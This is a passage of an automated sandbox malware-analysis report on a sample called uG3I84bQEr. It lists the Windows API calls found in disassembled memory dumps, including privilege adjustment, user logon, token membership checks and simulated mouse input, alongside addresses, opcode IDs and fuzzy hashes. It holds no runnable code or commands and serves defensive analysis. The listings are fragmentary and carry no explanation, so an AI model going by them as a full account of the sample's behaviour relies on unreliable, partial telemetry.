                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                            • String ID:
                                                            • API String ID: 1922334811-0
                                                            • Opcode ID: 6269b34ca0ffac1eb9693faefabfb6fb98685bcbc4fcd235cb874288e3286e77
                                                            • Instruction ID: 5e41a7b511489fb1457012ee205441660039eb57adee2e696ecce50f3e5e177b
                                                            • Opcode Fuzzy Hash: 6269b34ca0ffac1eb9693faefabfb6fb98685bcbc4fcd235cb874288e3286e77
                                                            • Instruction Fuzzy Hash: 7511BFB2514204AFE718EFA4EC85D2BB7F8EB05315B60852EF85593212EF34BC448B64
                                                            APIs
                                                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00458774
                                                            • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0045878B
                                                            • FreeSid.ADVAPI32(?), ref: 0045879B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: AllocateCheckFreeInitializeMembershipToken
                                                            • String ID:
                                                            • API String ID: 3429775523-0
                                                            • Opcode ID: 008726f0c27652ffd03f151f72c22d205906185045b9f325022e2ab268aa6496
                                                            • Instruction ID: 222101879978235e3db2a0a583f2c1bf244a93baf2b2f2d6b5292d8d16c370cf
                                                            • Opcode Fuzzy Hash: 008726f0c27652ffd03f151f72c22d205906185045b9f325022e2ab268aa6496
                                                            • Instruction Fuzzy Hash: 4CF04F7591130CBFDF00DFF4DC89AAEB7BCEF09201F104879A901E2181D7756A088B54
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(00000003,?,00B93F13,00000003,00BADE80,0000000C,00B9403D,00000003,00000002,00000000,?,00B92038,00000003), ref: 00B93F5E
                                                            • TerminateProcess.KERNEL32(00000000,?,00B93F13,00000003,00BADE80,0000000C,00B9403D,00000003,00000002,00000000,?,00B92038,00000003), ref: 00B93F65
                                                            • ExitProcess.KERNEL32 ref: 00B93F77
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2247376463.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b50000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: Process$CurrentExitTerminate
                                                            • String ID:
                                                            • API String ID: 1703294689-0
                                                            • Opcode ID: 0e020f61a98c3a92a5548f644a63fd34f34852b60483fa53a143a8b255514620
                                                            • Instruction ID: 2dfa5fadff2eb12d55f47eb1728e2a3ac4e444035ea4dcacc7b56a180aadef07
                                                            • Opcode Fuzzy Hash: 0e020f61a98c3a92a5548f644a63fd34f34852b60483fa53a143a8b255514620
                                                            • Instruction Fuzzy Hash: 80E04631804908AFCF016F28DE08A583BF9EB45B41F044064F8059B132CB35DE82CA80
                                                            APIs
                                                            • __time64.LIBCMT ref: 0046889B
                                                              • Part of subcall function 0042520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00468F6E,00000000,?,?,?,?,0046911F,00000000,?), ref: 00425213
                                                              • Part of subcall function 0042520A: __aulldiv.LIBCMT ref: 00425233
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: Time$FileSystem__aulldiv__time64
                                                            • String ID: 0eL
                                                            • API String ID: 2893107130-3167399643
                                                            • Opcode ID: 173a61627ebe1b4304b39b54128586dabbe463c8e4c1c1e482927ec7599268c1
                                                            • Instruction ID: 2c57299538d283c5d644ae0a39161a0e0d0ec28ce0c746f6c7e9e831f8b60585
                                                            • Opcode Fuzzy Hash: 173a61627ebe1b4304b39b54128586dabbe463c8e4c1c1e482927ec7599268c1
                                                            • Instruction Fuzzy Hash: B421AF326256108BC729CF29D841A52B3E1EFA5311B698F6DD0F5CB2C0DA38A905CB58
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0046C6FB
                                                            • FindClose.KERNEL32(00000000), ref: 0046C72B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: Find$CloseFileFirst
                                                            • String ID:
                                                            • API String ID: 2295610775-0
                                                            • Opcode ID: 45c62872381a6feff6d223480115480bdbba5ccbc8d99e64919f1b60502656e7
                                                            • Instruction ID: b4b64e4e0be63edce78860a78e1dfdfe78961efcf08952f795b51eb70efe8952
                                                            • Opcode Fuzzy Hash: 45c62872381a6feff6d223480115480bdbba5ccbc8d99e64919f1b60502656e7
                                                            • Instruction Fuzzy Hash: 411152726106049FDB10EF29D88592AF7E5EF85325F00C52EF9A5D7391DB34AC05CB85
                                                            APIs
                                                            • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00479468,?,0048FB84,?), ref: 0046A097
                                                            • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00479468,?,0048FB84,?), ref: 0046A0A9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: ErrorFormatLastMessage
                                                            • String ID:
                                                            • API String ID: 3479602957-0
                                                            • Opcode ID: aedf4ef7b819e7061a1d9f91078b4e07f1c96d427ff214e73d92c0d6c6dea44e
                                                            • Instruction ID: 2c9db32d3ae4548df1de74cdb7d607b6943671b75e71bd67b23ca617ca970478
                                                            • Opcode Fuzzy Hash: aedf4ef7b819e7061a1d9f91078b4e07f1c96d427ff214e73d92c0d6c6dea44e
                                                            • Instruction Fuzzy Hash: D8F0823550522DABDB21AFA4CC48FEE776CBF08361F00416AF909E6191DA349954CBA6
                                                            APIs
                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00458309), ref: 004581E0
                                                            • CloseHandle.KERNEL32(?,?,00458309), ref: 004581F2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: AdjustCloseHandlePrivilegesToken
                                                            • String ID:
                                                            • API String ID: 81990902-0
                                                            • Opcode ID: 982170e3e99e89f0b957f9e7bf2e1c5e5b077e6e7339dd3e1c64156aba8fb2ed
                                                            • Instruction ID: 9bafbd08ffd8acbbb2d026fb6ea58a2c51283803ccb0941fee12b6a17b14d6d6
                                                            • Opcode Fuzzy Hash: 982170e3e99e89f0b957f9e7bf2e1c5e5b077e6e7339dd3e1c64156aba8fb2ed
                                                            • Instruction Fuzzy Hash: 13E04632000620AEE7212B61FC08D777BEAEB04314720882EB8A680431CF22AC90DB18
                                                            APIs
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,00494178,00428D57,00493E50,?,?,00000001), ref: 0042A15A
                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0042A163
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled
                                                            • String ID:
                                                            • API String ID: 3192549508-0
                                                            • Opcode ID: c2bfc4d91f5eef072ecd4d4a99461c52a82975f392c39b974fa7ca05b3ef40fa
                                                            • Instruction ID: 9da78fce3b57c7d2137df8720d13279edd616241823e717daaa40eb201d223bb
                                                            • Opcode Fuzzy Hash: c2bfc4d91f5eef072ecd4d4a99461c52a82975f392c39b974fa7ca05b3ef40fa
                                                            • Instruction Fuzzy Hash: CCB09231254308ABCA022B91EC09B8C3F68EB46AA2F404434FA0D84C60CB6254548B99
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fe7d9b8eee1d273b37d623b7cc6cd26b30c9621dfee01b7311cae72a06f2c816
                                                            • Instruction ID: 9dbe1c865c2330f56ffee62ed517aae1867acb93b770053fb6672ec4a27fddfc
                                                            • Opcode Fuzzy Hash: fe7d9b8eee1d273b37d623b7cc6cd26b30c9621dfee01b7311cae72a06f2c816
                                                            • Instruction Fuzzy Hash: 08322861E29F114DD7239634D832336A258AFB73C8F95D737F819B5AA5EB28D4C34208
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9a83e6c9a1e03463649304356993a4cc28f03311dd18012bd76db8a2bb8b356c
                                                            • Instruction ID: 6c6381ca5121d9a8a5ca5470a2620081c1b3ce1be078dbaf297b8ac86cff2730
                                                            • Opcode Fuzzy Hash: 9a83e6c9a1e03463649304356993a4cc28f03311dd18012bd76db8a2bb8b356c
                                                            • Instruction Fuzzy Hash: E2B10130E2AF414DD72396398935336BA5CAFBB2C5F51D72BFC2670D22EB2185934185
                                                            APIs
                                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00B9399E,?,?,00000008,?,?,00B91CF4,00000000), ref: 00B93BD0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2247376463.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b50000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: ExceptionRaise
                                                            • String ID:
                                                            • API String ID: 3997070919-0
                                                            • Opcode ID: db97da991caa38f0fab7e2136a9a35903cf7fcb32f573992e9b7020bde608cdc
                                                            • Instruction ID: 78320175f0449628838b422ea99d12c27b5c7e2acaff709201084535bacb4dd1
                                                            • Opcode Fuzzy Hash: db97da991caa38f0fab7e2136a9a35903cf7fcb32f573992e9b7020bde608cdc
                                                            • Instruction Fuzzy Hash: 22B14D312106089FDB15CF28C4CAB657BE0FF45765F2586A8E8DACF2A1C335DA92CB40
                                                            APIs
                                                            • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00464C76
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: mouse_event
                                                            • String ID:
                                                            • API String ID: 2434400541-0
                                                            • Opcode ID: ee9df15493a40b048f6a63b66618f3ae232bfa5e5e2bfa15106318706817909b
                                                            • Instruction ID: b34e2a9394489d035c963e7dd8f40c9807a13273b0ab6c7f74163ad9f46ae88e
                                                            • Opcode Fuzzy Hash: ee9df15493a40b048f6a63b66618f3ae232bfa5e5e2bfa15106318706817909b
                                                            • Instruction Fuzzy Hash: BED05EA032220838ECA807209D5FF7F1109E3C0B81F96854B7241853C1F8DC6801A03F
                                                            APIs
                                                            • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00458389), ref: 004587D1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: LogonUser
                                                            • String ID:
                                                            • API String ID: 1244722697-0
                                                            • Opcode ID: 18205445d52b48e02bcf404b6a946f346a5f79f7dd958708f793c28153997f24
                                                            • Instruction ID: bbaf709efb0beb88cdfa5f1a33ae6004459e2c5163e494cc38a8a30eb56211a1
                                                            • Opcode Fuzzy Hash: 18205445d52b48e02bcf404b6a946f346a5f79f7dd958708f793c28153997f24
                                                            • Instruction Fuzzy Hash: 49D05E3226050EAFEF018EA4DC01EAE3B69EB04B01F408521FE15D50A1C775E835AB60
                                                            APIs
                                                            • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0042A12A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled
                                                            • String ID:
                                                            • API String ID: 3192549508-0
                                                            • Opcode ID: de316c34264f802ad97e41e2d96b97a4976e2443a0324b54249a0beeda03384a
                                                            • Instruction ID: 5f0b767449e3d37fa0a9cb76ca1a1966b2bcebad2f74a673b8e7725f9ca30b43
                                                            • Opcode Fuzzy Hash: de316c34264f802ad97e41e2d96b97a4976e2443a0324b54249a0beeda03384a
                                                            • Instruction Fuzzy Hash: E2A0113000020CAB8A022B82EC08888BFACEA022A0B008030F80C808228B32A8208A88
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2247376463.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b50000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c782746eed260e06528d4c9607e080493cf09f296c0a1a6988a1952876e83e63
                                                            • Instruction ID: 0667305259ef6221cdbdb48494c8eae6384ea6a7a2aac34d1e7ee67ca7d59cf4
                                                            • Opcode Fuzzy Hash: c782746eed260e06528d4c9607e080493cf09f296c0a1a6988a1952876e83e63
                                                            • Instruction Fuzzy Hash: 97822D76B083109FD748DF18D89075EF7E2ABC8314F1A893DA999E3354DA74EC118B86
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2247376463.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b50000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 77a720ceb3894a1c58d3be121cb02512e0a5151a18674b6d69420dd530db5a09
                                                            • Instruction ID: aa6d4d73dad0f52798d5c3cb39190725276af90112693af40d5a785660aaec3f
                                                            • Opcode Fuzzy Hash: 77a720ceb3894a1c58d3be121cb02512e0a5151a18674b6d69420dd530db5a09
                                                            • Instruction Fuzzy Hash: 5632D421E39F414DDB236638D862336A299AFB73D4F15D737E816B6DA5EF28C4835100
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bc918cabfbc13eeeaccb278bb908b555cf4655f640fadc8373e86b06f087c2cb
                                                            • Instruction ID: d3e05baf70842595a15b67714876080b4d37379fdc1224c105ba09137936e944
                                                            • Opcode Fuzzy Hash: bc918cabfbc13eeeaccb278bb908b555cf4655f640fadc8373e86b06f087c2cb
                                                            • Instruction Fuzzy Hash: 44223730904506CBDF288A68C4A47BEB7A1BF41345F28816FDD468B693DB7C9CD6C74A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                            • Instruction ID: 35e5cfd0643d00128ec34ecd890c43f992cb4d917009b55117061340238bc551
                                                            • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                            • Instruction Fuzzy Hash: 18C1D83230507349DF2D4639953403FFAA15EA27B139A076FD8B3CB2D4EE18D965D624
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2247376463.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b50000_uG3I84bQEr.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 55ecd314b4c5383ae3b665146288c950318f51326a4b3437a406d7ccc6c14070
                                                            • Instruction ID: 0dc8694feeaa221dad8ca001cacb5defa762a82728dd2f6dcf4cd204ea662272
                                                            • Opcode Fuzzy Hash: 55ecd314b4c5383ae3b665146288c950318f51326a4b3437a406d7ccc6c14070
                                                            • Instruction Fuzzy Hash: 5DD17F72A187818FC318DE5CC89165AFBE2EBD5300F488A3DE5D6D7785D674E809CB82
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
